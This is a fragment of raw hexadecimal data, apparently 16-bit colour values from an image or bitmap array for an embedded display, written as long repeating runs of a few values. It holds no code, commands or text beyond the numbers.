0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 